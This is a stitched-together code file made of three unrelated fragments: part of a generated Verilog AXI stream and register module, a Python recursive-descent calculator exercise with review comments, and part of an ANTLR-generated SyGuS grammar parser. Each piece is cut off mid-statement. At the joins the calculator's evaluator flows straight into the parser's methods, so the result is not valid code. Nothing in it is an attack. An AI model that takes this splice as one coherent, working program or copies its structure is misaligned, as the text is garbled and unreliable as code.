_axi_b_write_req_fifo_deq; wire [105-1:0] _axi_b_write_req_fifo_rdata; wire _axi_b_write_req_fifo_empty; wire _axi_b_write_req_fifo_almost_empty; assign _axi_b_write_req_fifo_enq = 0; assign _axi_b_write_req_fifo_wdata = 'hx; assign _axi_b_write_req_fifo_deq = 0; _axi_b_write_req_fifo inst__axi_b_write_req_fifo ( .CLK(CLK), .RST(RST), ._axi_b_write_req_fifo_enq(_axi_b_write_req_fifo_enq), ._axi_b_write_req_fifo_wdata(_axi_b_write_req_fifo_wdata), ._axi_b_write_req_fifo_full(_axi_b_write_req_fifo_full), ._axi_b_write_req_fifo_almost_full(_axi_b_write_req_fifo_almost_full), ._axi_b_write_req_fifo_deq(_axi_b_write_req_fifo_deq), ._axi_b_write_req_fifo_rdata(_axi_b_write_req_fifo_rdata), ._axi_b_write_req_fifo_empty(_axi_b_write_req_fifo_empty), 
._axi_b_write_req_fifo_almost_empty(_axi_b_write_req_fifo_almost_empty) ); reg [4-1:0] count__axi_b_write_req_fifo; wire [8-1:0] _axi_b_write_op_sel_fifo; wire [32-1:0] _axi_b_write_local_addr_fifo; wire [32-1:0] _axi_b_write_local_stride_fifo; wire [33-1:0] _axi_b_write_size_fifo; wire [8-1:0] unpack_write_req_op_sel_4; wire [32-1:0] unpack_write_req_local_addr_5; wire [32-1:0] unpack_write_req_local_stride_6; wire [33-1:0] unpack_write_req_local_size_7; assign unpack_write_req_op_sel_4 = _axi_b_write_req_fifo_rdata[104:97]; assign unpack_write_req_local_addr_5 = _axi_b_write_req_fifo_rdata[96:65]; assign unpack_write_req_local_stride_6 = _axi_b_write_req_fifo_rdata[64:33]; assign unpack_write_req_local_size_7 = _axi_b_write_req_fifo_rdata[32:0]; assign _axi_b_write_op_sel_fifo = unpack_write_req_op_sel_4; assign _axi_b_write_local_addr_fifo = unpack_write_req_local_addr_5; assign _axi_b_write_local_stride_fifo = unpack_write_req_local_stride_6; assign _axi_b_write_size_fifo = unpack_write_req_local_size_7; reg [8-1:0] _axi_b_write_op_sel_buf; reg [32-1:0] _axi_b_write_local_addr_buf; reg [32-1:0] _axi_b_write_local_stride_buf; reg [33-1:0] _axi_b_write_size_buf; reg _axi_b_write_data_idle; wire _axi_b_write_idle; assign _axi_b_write_idle = _axi_b_write_req_fifo_empty && _axi_b_write_data_idle; assign saxi_bresp = 0; assign saxi_rresp = 0; reg signed [32-1:0] _saxi_register_0; reg signed [32-1:0] _saxi_register_1; reg signed [32-1:0] _saxi_register_2; reg signed [32-1:0] _saxi_register_3; reg _saxi_flag_0; reg _saxi_flag_1; reg _saxi_flag_2; reg _saxi_flag_3; reg signed [32-1:0] _saxi_resetval_0; reg signed [32-1:0] _saxi_resetval_1; reg signed [32-1:0] _saxi_resetval_2; reg signed [32-1:0] _saxi_resetval_3; localparam _saxi_maskwidth = 2; localparam _saxi_mask = { _saxi_maskwidth{ 1'd1 } }; localparam _saxi_shift = 2; reg [32-1:0] _saxi_register_fsm; localparam _saxi_register_fsm_init = 0; reg [32-1:0] addr_8; reg writevalid_9; reg readvalid_10; reg 
prev_awvalid_11; reg prev_arvalid_12; assign saxi_awready = (_saxi_register_fsm == 0) && (!writevalid_9 && !readvalid_10 && !saxi_bvalid && prev_awvalid_11); assign saxi_arready = (_saxi_register_fsm == 0) && (!readvalid_10 && !writevalid_9 && prev_arvalid_12 && !prev_awvalid_11); reg [_saxi_maskwidth-1:0] axis_maskaddr_13; wire signed [32-1:0] axislite_rdata_14; assign axislite_rdata_14 = (axis_maskaddr_13 == 0)? _saxi_register_0 : (axis_maskaddr_13 == 1)? _saxi_register_1 : (axis_maskaddr_13 == 2)? _saxi_register_2 : (axis_maskaddr_13 == 3)? _saxi_register_3 : 'hx; wire axislite_flag_15; assign axislite_flag_15 = (axis_maskaddr_13 == 0)? _saxi_flag_0 : (axis_maskaddr_13 == 1)? _saxi_flag_1 : (axis_maskaddr_13 == 2)? _saxi_flag_2 : (axis_maskaddr_13 == 3)? _saxi_flag_3 : 'hx; wire signed [32-1:0] axislite_resetval_16; assign axislite_resetval_16 = (axis_maskaddr_13 == 0)? _saxi_resetval_0 : (axis_maskaddr_13 == 1)? _saxi_resetval_1 : (axis_maskaddr_13 == 2)? _saxi_resetval_2 : (axis_maskaddr_13 == 3)? 
_saxi_resetval_3 : 'hx; reg _saxi_cond_0_1; assign saxi_wready = _saxi_register_fsm == 2; reg [32-1:0] th_comp; localparam th_comp_init = 0; reg signed [32-1:0] _th_comp_size_0; reg signed [32-1:0] _th_comp_i_1; reg signed [32-1:0] axistreamin_tdata_17; reg axistreamin_tlast_18; assign axi_a_tready = th_comp == 8; reg signed [32-1:0] _th_comp_a_2; reg signed [32-1:0] _th_comp_a_last_3; reg signed [32-1:0] _th_comp_b_4; reg signed [32-1:0] _th_comp_b_last_5; reg _axi_b_cond_0_1; always @(posedge CLK) begin if(RST) begin _axi_a_read_data_idle <= 1; end else begin if((th_comp == 7) && _axi_a_read_data_idle) begin _axi_a_read_data_idle <= 0; end if((th_comp == 8) && axi_a_tvalid) begin _axi_a_read_data_idle <= 1; end end end always @(posedge CLK) begin if(RST) begin count__axi_a_read_req_fifo <= 0; end else begin if(_axi_a_read_req_fifo_enq && !_axi_a_read_req_fifo_full && (_axi_a_read_req_fifo_deq && !_axi_a_read_req_fifo_empty)) begin count__axi_a_read_req_fifo <= count__axi_a_read_req_fifo; end else if(_axi_a_read_req_fifo_enq && !_axi_a_read_req_fifo_full) begin count__axi_a_read_req_fifo <= count__axi_a_read_req_fifo + 1; end else if(_axi_a_read_req_fifo_deq && !_axi_a_read_req_fifo_empty) begin count__axi_a_read_req_fifo <= count__axi_a_read_req_fifo - 1; end end end always @(posedge CLK) begin if(RST) begin _axi_b_write_data_idle <= 1; axi_b_tdata <= 0; axi_b_tvalid <= 0; axi_b_tlast <= 0; _axi_b_cond_0_1 <= 0; end else begin if(_axi_b_cond_0_1) begin axi_b_tvalid <= 0; axi_b_tlast <= 0; end if((th_comp == 12) && _axi_b_write_data_idle) begin _axi_b_write_data_idle <= 0; end if((th_comp == 13) && (axi_b_tready || !axi_b_tvalid)) begin axi_b_tdata <= _th_comp_b_4; axi_b_tvalid <= 1; axi_b_tlast <= _th_comp_b_last_5; end _axi_b_cond_0_1 <= 1; if(axi_b_tvalid && !axi_b_tready) begin axi_b_tvalid <= axi_b_tvalid; axi_b_tlast <= axi_b_tlast; end if((th_comp == 13) && (axi_b_tready || !axi_b_tvalid)) begin _axi_b_write_data_idle <= 1; end end end always @(posedge CLK) 
begin if(RST) begin count__axi_b_write_req_fifo <= 0; end else begin if(_axi_b_write_req_fifo_enq && !_axi_b_write_req_fifo_full && (_axi_b_write_req_fifo_deq && !_axi_b_write_req_fifo_empty)) begin count__axi_b_write_req_fifo <= count__axi_b_write_req_fifo; end else if(_axi_b_write_req_fifo_enq && !_axi_b_write_req_fifo_full) begin count__axi_b_write_req_fifo <= count__axi_b_write_req_fifo + 1; end else if(_axi_b_write_req_fifo_deq && !_axi_b_write_req_fifo_empty) begin count__axi_b_write_req_fifo <= count__axi_b_write_req_fifo - 1; end end end always @(posedge CLK) begin if(RST) begin saxi_bvalid <= 0; prev_awvalid_11 <= 0; prev_arvalid_12 <= 0; writevalid_9 <= 0; readvalid_10 <= 0; addr_8 <= 0; saxi_rdata <= 0; saxi_rvalid <= 0; _saxi_cond_0_1 <= 0; _saxi_register_0 <= 0; _saxi_flag_0 <= 0; _saxi_register_1 <= 0; _saxi_flag_1 <= 0; _saxi_register_2 <= 0; _saxi_flag_2 <= 0; _saxi_register_3 <= 0; _saxi_flag_3 <= 0; end else begin if(_saxi_cond_0_1) begin saxi_rvalid <= 0; end if(saxi_bvalid && saxi_bready) begin saxi_bvalid <= 0; end if(saxi_wvalid && saxi_wready) begin saxi_bvalid <= 1; end prev_awvalid_11 <= saxi_awvalid; prev_arvalid_12 <= saxi_arvalid; writevalid_9 <= 0; readvalid_10 <= 0; if(saxi_awready && saxi_awvalid && !saxi_bvalid) begin addr_8 <= saxi_awaddr; writevalid_9 <= 1; end else if(saxi_arready && saxi_arvalid) begin addr_8 <= saxi_araddr; readvalid_10 <= 1; end if((_saxi_register_fsm == 1) && (saxi_rready || !saxi_rvalid)) begin saxi_rdata <= axislite_rdata_14; saxi_rvalid <= 1; end _saxi_cond_0_1 <= 1; if(saxi_rvalid && !saxi_rready) begin saxi_rvalid <= saxi_rvalid; end if((_saxi_register_fsm == 1) && (saxi_rready || !saxi_rvalid) && axislite_flag_15 && (axis_maskaddr_13 == 0)) begin _saxi_register_0 <= axislite_resetval_16; _saxi_flag_0 <= 0; end if((_saxi_register_fsm == 1) && (saxi_rready || !saxi_rvalid) && axislite_flag_15 && (axis_maskaddr_13 == 1)) begin _saxi_register_1 <= axislite_resetval_16; _saxi_flag_1 <= 0; end 
if((_saxi_register_fsm == 1) && (saxi_rready || !saxi_rvalid) && axislite_flag_15 && (axis_maskaddr_13 == 2)) begin _saxi_register_2 <= axislite_resetval_16; _saxi_flag_2 <= 0; end if((_saxi_register_fsm == 1) && (saxi_rready || !saxi_rvalid) && axislite_flag_15 && (axis_maskaddr_13 == 3)) begin _saxi_register_3 <= axislite_resetval_16; _saxi_flag_3 <= 0; end if((_saxi_register_fsm == 2) && saxi_wvalid && (axis_maskaddr_13 == 0)) begin _saxi_register_0 <= saxi_wdata; end if((_saxi_register_fsm == 2) && saxi_wvalid && (axis_maskaddr_13 == 1)) begin _saxi_register_1 <= saxi_wdata; end if((_saxi_register_fsm == 2) && saxi_wvalid && (axis_maskaddr_13 == 2)) begin _saxi_register_2 <= saxi_wdata; end if((_saxi_register_fsm == 2) && saxi_wvalid && (axis_maskaddr_13 == 3)) begin _saxi_register_3 <= saxi_wdata; end if((_saxi_register_0 == 1) && (th_comp == 2) && 1) begin _saxi_register_0 <= 0; end if((_saxi_register_0 == 1) && (th_comp == 2) && 0) begin _saxi_register_1 <= 0; end if((_saxi_register_0 == 1) && (th_comp == 2) && 0) begin _saxi_register_2 <= 0; end if((_saxi_register_0 == 1) && (th_comp == 2) && 0) begin _saxi_register_3 <= 0; end if((th_comp == 3) && 0) begin _saxi_register_0 <= 1; _saxi_flag_0 <= 0; end if((th_comp == 3) && 1) begin _saxi_register_1 <= 1; _saxi_flag_1 <= 0; end if((th_comp == 3) && 0) begin _saxi_register_2 <= 1; _saxi_flag_2 <= 0; end if((th_comp == 3) && 0) begin _saxi_register_3 <= 1; _saxi_flag_3 <= 0; end if((th_comp == 15) && 0) begin _saxi_register_0 <= 0; _saxi_flag_0 <= 0; end if((th_comp == 15) && 1) begin _saxi_register_1 <= 0; _saxi_flag_1 <= 0; end if((th_comp == 15) && 0) begin _saxi_register_2 <=
# Source: GeorgiyDemo/FA — "Course I/Практика Python/Part1/pract2/task1.py"
"""
A text calculator for several proper, improper and mixed fractions and plain
numbers, with mathematical order of evaluation.

Mixed fractions are written as 5(1/4), proper fractions as 5/9, improper
fractions as 19/7. The result must be reduced and, when necessary, printed as
a mixed fraction. After each operation the next expression can be entered;
the program terminates on the command ``exit``.

The calculator also supports saving the result of a computation with the
command ``save result_name`` (up to 10 saved results). The command
``del result_name`` removes a result from the saved set. The command
``to double`` prints the result as a floating point number.

Using ``eval()`` and anything similar is FORBIDDEN!

Example:
    Input: 2/3 + 2 * 4 / (5-3)
    Output: 4(2/3)
    Input: save m1
    Output: save success
    Input: 3 * (m1 + 15/6)
    Output: 11(1/2)
    Input: to double
    Output: 11.5
"""
## -*- coding: utf-8 -*-
import math

# Math consts
M_PI = 3.1415926535897932384626433832795
F_G = 9.81
M_E = 2.71828182845904523536
H_LEET = 1337

# Defines
MAX_EXPR_LEN = 255
MAX_TOKEN_LEN = 80

# Brackets
CALC_END = -1
CALC_L_BRACKET = -2
CALC_R_BRACKET = -3
CALC_NUMBER = -4

# Operations
OP_PLUS = 0
OP_MINUS = 1
OP_MULTIPLY = 2
OP_DIVIDE = 3
OP_PERCENT = 4
OP_POWER = 5
OP_UMINUS = 6

# Math Operations
OP_SIN = 7
OP_COS = 8
OP_TG = 9
OP_CTG = 10
OP_ARCSIN = 11
OP_ARCCOS = 12
OP_ARCTG = 13
OP_ARCCTG = 14
OP_SH = 15
OP_CH = 16
OP_TH = 17
OP_CTH = 18
OP_EXP = 19
OP_LG = 20
OP_LN = 21
OP_SQRT = 22
OP_IN = 23
CALC_PI = 24
CALC_G = 25
CALC_LEET = 26

TERMINATOR = "\x00"


def strlen(list1):
    """C-style strlen: number of characters in *list1* before the first TERMINATOR.

    Raises IndexError if no TERMINATOR is present (mirrors reading past a C buffer).
    """
    list1 = list(list1)
    i = 0
    while list1[i] != TERMINATOR:
        i = i + 1
    return i


def strcmp(list1, list2):
    """C-style string comparison over character lists.

    Each argument is a list of characters, optionally terminated by TERMINATOR
    (callers pass the TERMINATOR-padded ``curToken`` buffer and a plain
    ``list("keyword")``). Returns a falsy value (0) when both strings are equal
    and a truthy value (1) otherwise — callers test equality via ``not strcmp(...)``.

    Bug fix: the previous version compared only ``min(len, len)`` characters and
    fell off the end (implicitly returning None) when that prefix matched, so a
    token such as "sina" compared equal to the keyword "sin". Strings are now
    compared over their full terminator-delimited length.
    """
    def _chars(seq):
        # Take the characters up to the first TERMINATOR (or all of them if absent).
        seq = list(seq)
        return seq[: seq.index(TERMINATOR)] if TERMINATOR in seq else seq

    return 0 if _chars(list1) == _chars(list2) else 1


def atof(text):
    """Parse the TERMINATOR-delimited characters of *text* as a number.

    Returns an int when the value is integral (e.g. "42" -> 42, "007" -> 7),
    otherwise a float (e.g. "3.5" -> 3.5).

    Bug fix: the previous version called ``int(text)`` on the raw literal first,
    which raised ValueError for any decimal literal like "3.5" — i.e. every
    number containing a point crashed the calculator.
    """
    raw = "".join(text[: strlen(text)])
    value = float(raw)
    whole = int(value)
    return whole if whole == value else value


class TCALCNode:
    """A node of the expression parse tree.

    ``value`` is either an operation constant (OP_*/CALC_*) for inner nodes or
    the numeric value itself for leaf nodes; ``left``/``right`` are child nodes.
    """

    value = 0
    left = None
    right = None

    def __init__(self, _value=0, _left=None, _right=None):
        self.left = _left
        self.right = _right
        self.value = _value


class TCALC:
    """Recursive-descent expression tokenizer / parser / evaluator."""

    # NOTE(review): these are class-level (shared) attributes; Compile() rebinds
    # ``expr`` per call, but ``curToken`` is mutated in place — confirm single-instance use.
    root = None
    expr = [TERMINATOR for i in range(0, MAX_EXPR_LEN)]
    curToken = [TERMINATOR for i in range(0, MAX_TOKEN_LEN)]
    typToken = 0
    pos = 0
    result = 0

    def IsDelim(self):
        """True when the current character is an operator or bracket."""
        return self.expr[self.pos] in "+-*/%^()[]"

    def IsLetter(self):
        """True when the current character is an ASCII letter."""
        ch = self.expr[self.pos]
        return "a" <= ch <= "z" or "A" <= ch <= "Z"

    def IsDigit(self):
        """True when the current character is a decimal digit."""
        return "0" <= self.expr[self.pos] <= "9"

    def IsPoint(self):
        """True when the current character is a decimal point."""
        return self.expr[self.pos] == "."
    def GetToken(self):
        """Scan the next token from ``self.expr`` starting at ``self.pos``.

        Side effects: fills ``self.curToken`` (a TERMINATOR-terminated character
        list), advances ``self.pos`` and sets ``self.typToken``. Returns True on
        success, False after reporting an unknown character via SendError.
        """
        self.curToken[0] = TERMINATOR
        # Skip whitespace.
        while self.expr[self.pos] == " ":
            self.pos = self.pos + 1
        if self.expr[self.pos] == TERMINATOR:
            # End of expression.
            self.curToken[0] = TERMINATOR
            self.typToken = CALC_END
            return True
        elif self.IsDelim():
            # Single-character operator / bracket token.
            choose_dict = {
                "+": OP_PLUS,
                "-": OP_MINUS,
                "*": OP_MULTIPLY,
                "/": OP_DIVIDE,
                "%": OP_PERCENT,
                "[": CALC_L_BRACKET,
                "(": CALC_L_BRACKET,
                "]": CALC_R_BRACKET,
                ")": CALC_R_BRACKET,
            }
            self.curToken[0] = self.expr[self.pos]
            self.pos = self.pos + 1
            self.curToken[1] = TERMINATOR
            tmp = "".join(self.curToken[: strlen(self.curToken)])
            if tmp in choose_dict:
                self.typToken = choose_dict[tmp]
                return True
            # NOTE(review): "^" passes IsDelim() but is absent from choose_dict, so
            # this branch falls through and implicitly returns None with a stale
            # typToken — OP_POWER appears unreachable from here; confirm intent.
        elif self.IsLetter():
            # Identifier token: collect consecutive letters.
            i = 0
            while self.IsLetter():
                self.curToken[i] = self.expr[self.pos]
                self.pos = self.pos + 1
                i = i + 1
            self.curToken[i] = TERMINATOR
            len = strlen(self.curToken)  # NOTE(review): shadows the builtin ``len`` within this method.
            # Lowercase the token (ASCII only) before keyword matching.
            for i in range(0, len):
                if ord(self.curToken[i]) >= ord("A") and ord(self.curToken[i]) <= ord("Z"):
                    self.curToken[i] = chr(ord(self.curToken[i]) + ord("a") - ord("A"))
            # Keyword table: map the identifier to its token constant.
            # NOTE(review): OP_ARCTG / OP_ARCCTG exist as constants but have no
            # keyword mapping here ("arctg"/"arcctg" fall through to SendError(0)).
            if not strcmp(self.curToken, list("leet")):
                self.typToken = CALC_LEET
                return True
            elif not strcmp(self.curToken, list("g")):
                self.typToken = CALC_G
                return True
            elif not strcmp(self.curToken, list("pi")):
                self.typToken = CALC_PI
                return True
            elif not strcmp(self.curToken, list("sin")):
                self.typToken = OP_SIN
                return True
            elif not strcmp(self.curToken, list("cos")):
                self.typToken = OP_COS
                return True
            elif not strcmp(self.curToken, list("tg")):
                self.typToken = OP_TG
                return True
            elif not strcmp(self.curToken, list("ctg")):
                self.typToken = OP_CTG
                return True
            elif not strcmp(self.curToken, list("arcsin")):
                self.typToken = OP_ARCSIN
                return True
            elif not strcmp(self.curToken, list("arccos")):
                self.typToken = OP_ARCCOS
                return True
            elif not strcmp(self.curToken, list("sh")):
                self.typToken = OP_SH
                return True
            elif not strcmp(self.curToken, list("ch")):
                self.typToken = OP_CH
                return True
            elif not strcmp(self.curToken, list("th")):
                self.typToken = OP_TH
                return True
            elif not strcmp(self.curToken, list("cth")):
                self.typToken = OP_CTH
                return True
            elif not strcmp(self.curToken, list("exp")):
                self.typToken = OP_EXP
                return True
            elif not strcmp(self.curToken, list("lg")):
                self.typToken = OP_LG
                return True
            elif not strcmp(self.curToken, list("ln")):
                self.typToken = OP_LN
                return True
            elif not strcmp(self.curToken, list("sqrt")):
                self.typToken = OP_SQRT
                return True
            else:
                self.SendError(0)
        elif self.IsDigit() or self.IsPoint():
            # Number literal: digits, optional decimal point, more digits.
            i = 0
            while self.IsDigit():
                self.curToken[i] = self.expr[self.pos]
                self.pos = self.pos + 1
                i = i + 1
            if self.IsPoint():
                self.curToken[i] = self.expr[self.pos]
                self.pos = self.pos + 1
                i = i + 1
                while self.IsDigit():
                    self.curToken[i] = self.expr[self.pos]
                    self.pos = self.pos + 1
                    i = i + 1
            self.curToken[i] = TERMINATOR
            self.typToken = CALC_NUMBER
            return True
        else:
            # Unknown character: report it and stop scanning.
            self.curToken[0] = self.expr[self.pos]
            self.pos = self.pos + 1
            self.curToken[1] = TERMINATOR
            self.SendError(1)
            return False

    def CreateNode(self, _value, _left, _right):
        """Allocate a new parse-tree node."""
        return TCALCNode(_value, _left, _right)

    def Expr(self):
        """expr ::= expr1 (('+' | '-') expr1)* — lowest precedence level."""
        temp = self.Expr1()
        while True:
            if self.typToken == OP_PLUS:
                self.GetToken()
                temp = self.CreateNode(OP_PLUS, temp, self.Expr1())
            elif self.typToken == OP_MINUS:
                self.GetToken()
                temp = self.CreateNode(OP_MINUS, temp, self.Expr1())
            else:
                break
        return temp

    def Expr1(self):
        """expr1 ::= expr2 (('*' | '/' | '%') expr2)*"""
        temp = self.Expr2()
        while True:
            if self.typToken == OP_MULTIPLY:
                self.GetToken()
                temp = self.CreateNode(OP_MULTIPLY, temp, self.Expr2())
            elif self.typToken == OP_DIVIDE:
                self.GetToken()
                temp = self.CreateNode(OP_DIVIDE, temp, self.Expr2())
            elif self.typToken == OP_PERCENT:
                self.GetToken()
                temp = self.CreateNode(OP_PERCENT, temp, self.Expr2())
            else:
                break
        return temp

    def Expr2(self):
        """expr2 ::= ('+' | '-')? expr3 — unary sign."""
        temp = None
        if self.typToken == OP_PLUS:
            # Unary plus: no node needed.
            self.GetToken()
            temp = self.Expr3()
        elif self.typToken == OP_MINUS:
            temp = self.CreateNode(OP_UMINUS, self.Expr3(), None)
        else:
            temp = self.Expr3()
        return temp

    def Expr3(self):
        """expr3 ::= function '(' expr ')' | expr4"""
        temp = None
        # NOTE(review): the upper bound ``OP_SQRT + 1`` also admits OP_IN (23);
        # confirm whether OP_IN is really meant to parse as a function here.
        if self.typToken >= OP_SIN and self.typToken <= OP_SQRT + 1:
            # ``OP_SIN - OP_SIN + self.typToken`` is just ``self.typToken``.
            temp = self.CreateNode(OP_SIN - OP_SIN + self.typToken, None, None)
            self.GetToken()
            if self.typToken != CALC_L_BRACKET:
                self.SendError(4)
            self.GetToken()
            temp.left = self.Expr()
            if self.typToken != CALC_R_BRACKET:
                self.SendError(5)
            self.GetToken()
        else:
            temp = self.Expr4()
        return temp

    def Expr4(self):
        """expr4 ::= NUMBER | 'pi' | 'g' | 'leet' | '(' expr ')'"""
        temp = None
        if self.typToken == CALC_NUMBER:
            temp = self.CreateNode(atof(self.curToken), None, None)
            self.GetToken()
        elif self.typToken == CALC_PI:
            temp = self.CreateNode(M_PI, None, None)
            self.GetToken()
        elif self.typToken == CALC_G:
            temp = self.CreateNode(F_G, None, None)
            self.GetToken()
        elif self.typToken == CALC_L_BRACKET:
            self.GetToken()
            temp = self.Expr()
            if self.typToken != CALC_R_BRACKET:
                self.SendError(5)
            self.GetToken()
        elif self.typToken == CALC_LEET:
            temp = self.CreateNode(H_LEET, None, None)
            self.GetToken()
        else:
            self.SendError(5)
        return temp

    def SendError(self, errNum):
        """Print a Russian-language diagnostic and abort parsing by raising Exception.

        NOTE(review): ``self.curToken == TERMINATOR`` compares a list against a str,
        so the "empty expression" branch can never trigger; error codes 0 and 1
        land on the generic "unknown error" message. Messages are user-facing
        runtime strings and are deliberately left untouched.
        """
        if self.curToken == TERMINATOR:
            print("Пустое выражение")  # "Empty expression"
        elif errNum == 2:
            print("Внезапный конец выражения")  # "Unexpected end of expression"
        elif errNum == 3:
            print("Конец выражения ожидается")  # "End of expression expected"
        elif errNum == 4:
            print("Пропущеннаи открывающая скобка")  # "Missing opening bracket"
        elif errNum == 5:
            print("Пропущенна закрывающая скобка")  # "Missing closing bracket"
        else:
            print("Неизвестная ошибка")  # "Unknown error"
        raise Exception("")

    def Compile(self, _expr):
        """Tokenize and parse ``_expr`` (a list of characters) into ``self.root``.

        Raises (via SendError) when the expression is empty or has trailing tokens.
        """
        self.pos = 0
        self.expr = _expr + [TERMINATOR]
        if self.root != None:
            self.root = None
        self.GetToken()
        if self.typToken == CALC_END:
            self.SendError(2)
        self.root = self.Expr()
        if self.typToken != CALC_END:
            self.SendError(3)
        return True

    def GetResult(self):
        """Return the value computed by the last :meth:`Evaluate` call."""
        return self.result

    def Evaluate(self):
        """Evaluate the parse tree rooted at ``self.root`` into ``self.result``."""
        self.result = self.CalcTree(self.root)

    def CalcTree(self, tree):
        """Recursively evaluate a parse (sub)tree and return its numeric value."""
        temp = 0
        if tree.left == None and tree.right == None:
            # Leaf node: its value is the number itself.
            return tree.value
        else:
            op = tree.value
            if op == OP_PLUS:
                return self.CalcTree(tree.left) + self.CalcTree(tree.right)
            elif op == OP_MINUS:
                return self.CalcTree(tree.left) - self.CalcTree(tree.right)
            elif op == OP_MULTIPLY:
                return self.CalcTree(tree.left) * self.CalcTree(tree.right)
            elif op == OP_DIVIDE:
                return self.CalcTree(tree.left) / self.CalcTree(tree.right)
            elif op == OP_PERCENT:
                return self.CalcTree(tree.left) % (self.CalcTree(tree.right))
            elif op == OP_POWER:
                return math.pow(self.CalcTree(tree.left), self.CalcTree(tree.right))
            elif op == OP_UMINUS:
                return -self.CalcTree(tree.left)
            elif op == OP_SIN:
                return math.sin(self.CalcTree(tree.left))
            elif op == OP_COS:
                return math.cos(self.CalcTree(tree.left))
            elif op == OP_TG:
                return math.tan(self.CalcTree(tree.left))
            elif op == OP_CTG:
                return 1.0 / math.tan(self.CalcTree(tree.left))
            elif op == OP_ARCSIN:
                return math.asin(self.CalcTree(tree.left))
            elif op == OP_ARCCOS:
                return math.acos(self.CalcTree(tree.left))
            elif op == OP_ARCTG:
                return math.atan(self.CalcTree(tree.left))
            elif op == OP_ARCCTG:
                return M_PI / 2.0 - math.atan(self.CalcTree(tree.left))
            elif op == OP_SH:
                # Hyperbolic functions are computed from exponentials.
                temp = self.CalcTree(tree.left)
                return (math.exp(temp) - math.exp(-temp)) / 2.0
            elif op == OP_CH:
                temp = self.CalcTree(tree.left)
                return (math.exp(temp) + math.exp(-temp)) / 2.0
            elif op == OP_TH:
                temp = self.CalcTree(tree.left)
                return (math.exp(temp) - math.exp(-temp)) / (
                    math.exp(temp) + math.exp(-temp)
                )
            elif op == OP_CTH:
                temp = self.CalcTree(tree.left)
                return (math.exp(temp) + math.exp(-temp)) / (
                    math.exp(temp) - math.exp(-temp)
                )
            elif op == OP_EXP:
                return math.exp(self.CalcTree(tree.left))
            elif op == OP_LG:
                return math.log10(self.CalcTree(tree.left))
            elif op == OP_LN:
                return math.log(self.CalcTree(tree.left))
            elif op == OP_SQRT:
                return math.sqrt(self.CalcTree(tree.left))
            elif op == OP_IN:
                # NOTE(review): OP_IN evaluates to the constant 1; this chunk is cut
                # here, so any further branches lie outside this view.
                return 1
        # --- ANTLR-generated parser code below: edits limited to comments. ---

        def declarePrimedVar(self):
            return self.getTypedRuleContext(SygusParser.DeclarePrimedVarContext,0)


        def invConstraintCmd(self):
            return self.getTypedRuleContext(SygusParser.InvConstraintCmdContext,0)


        def getRuleIndex(self):
            return SygusParser.RULE_cmd

        def enterRule(self, listener:ParseTreeListener):
            if hasattr( listener, "enterCmd" ):
                listener.enterCmd(self)

        def exitRule(self, listener:ParseTreeListener):
            if hasattr( listener, "exitCmd" ):
                listener.exitCmd(self)

        def accept(self, visitor:ParseTreeVisitor):
            if hasattr( visitor, "visitCmd" ):
                return visitor.visitCmd(self)
            else:
                return visitor.visitChildren(self)




    def cmd(self):
        # Rule 'cmd': dispatch to one of 11 alternatives chosen by adaptive prediction.
        localctx = SygusParser.CmdContext(self, self._ctx, self.state)
        self.enterRule(localctx, 12, self.RULE_cmd)
        try:
            self.state = 143
            self._errHandler.sync(self)
            la_ = self._interp.adaptivePredict(self._input,3,self._ctx)
            if la_ == 1:
                self.enterOuterAlt(localctx, 1)
                self.state = 132
                self.funDefCmd()
                pass

            elif la_ == 2:
                self.enterOuterAlt(localctx, 2)
                self.state = 133
                self.funDeclCmd()
                pass

            elif la_ == 3:
                self.enterOuterAlt(localctx, 3)
                self.state = 134
                self.synthFunCmd()
                pass

            elif la_ == 4:
                self.enterOuterAlt(localctx, 4)
                self.state = 135
                self.checkSynthCmd()
                pass

            elif la_ == 5:
                self.enterOuterAlt(localctx, 5)
                self.state = 136
                self.constraintCmd()
                pass

            elif la_ == 6:
                self.enterOuterAlt(localctx, 6)
                self.state = 137
                self.sortDefCmd()
                pass

            elif la_ == 7:
                self.enterOuterAlt(localctx, 7)
                self.state = 138
                self.setOptsCmd()
                pass

            elif la_ == 8:
                self.enterOuterAlt(localctx, 8)
                self.state = 139
                self.varDeclCmd()
                pass

            elif la_ == 9:
                self.enterOuterAlt(localctx, 9)
                self.state = 140
                self.synthInvCmd()
                pass

            elif la_ == 10:
                self.enterOuterAlt(localctx, 10)
                self.state = 141
                self.declarePrimedVar()
                pass

            elif la_ == 11:
                self.enterOuterAlt(localctx, 11)
                self.state = 142
                self.invConstraintCmd()
                pass


        except RecognitionException as re:
            localctx.exception = re
            self._errHandler.reportError(self, re)
            self._errHandler.recover(self, re)
        finally:
            self.exitRule()
        return localctx


    class VarDeclCmdContext(ParserRuleContext):

        def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
            super().__init__(parent, invokingState)
            self.parser = parser

        def symbol(self):
            return self.getTypedRuleContext(SygusParser.SymbolContext,0)


        def sortExpr(self):
            return self.getTypedRuleContext(SygusParser.SortExprContext,0)


        def getRuleIndex(self):
            return SygusParser.RULE_varDeclCmd

        def enterRule(self, listener:ParseTreeListener):
            if hasattr( listener, "enterVarDeclCmd" ):
                listener.enterVarDeclCmd(self)

        def exitRule(self, listener:ParseTreeListener):
            if hasattr( listener, "exitVarDeclCmd" ):
                listener.exitVarDeclCmd(self)

        def accept(self, visitor:ParseTreeVisitor):
            if hasattr( visitor, "visitVarDeclCmd" ):
                return visitor.visitVarDeclCmd(self)
            else:
                return visitor.visitChildren(self)




    def varDeclCmd(self):
        # Rule 'varDeclCmd': '(' 'declare-var' symbol sortExpr ')'.
        localctx = SygusParser.VarDeclCmdContext(self, self._ctx, self.state)
        self.enterRule(localctx, 14, self.RULE_varDeclCmd)
        try:
            self.enterOuterAlt(localctx, 1)
            self.state = 145
            self.match(SygusParser.T__0)
            self.state = 146
            self.match(SygusParser.T__3)
            self.state = 147
            self.symbol()
            self.state = 148
            self.sortExpr()
            self.state = 149
            self.match(SygusParser.T__2)
        except RecognitionException as re:
            localctx.exception = re
            self._errHandler.reportError(self, re)
            self._errHandler.recover(self, re)
        finally:
            self.exitRule()
        return localctx


    class SortDefCmdContext(ParserRuleContext):

        def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
            super().__init__(parent, invokingState)
            self.parser = parser

        def symbol(self):
            return self.getTypedRuleContext(SygusParser.SymbolContext,0)


        def sortExpr(self):
            return self.getTypedRuleContext(SygusParser.SortExprContext,0)


        def getRuleIndex(self):
            return SygusParser.RULE_sortDefCmd

        def enterRule(self, listener:ParseTreeListener):
            if hasattr( listener, "enterSortDefCmd" ):
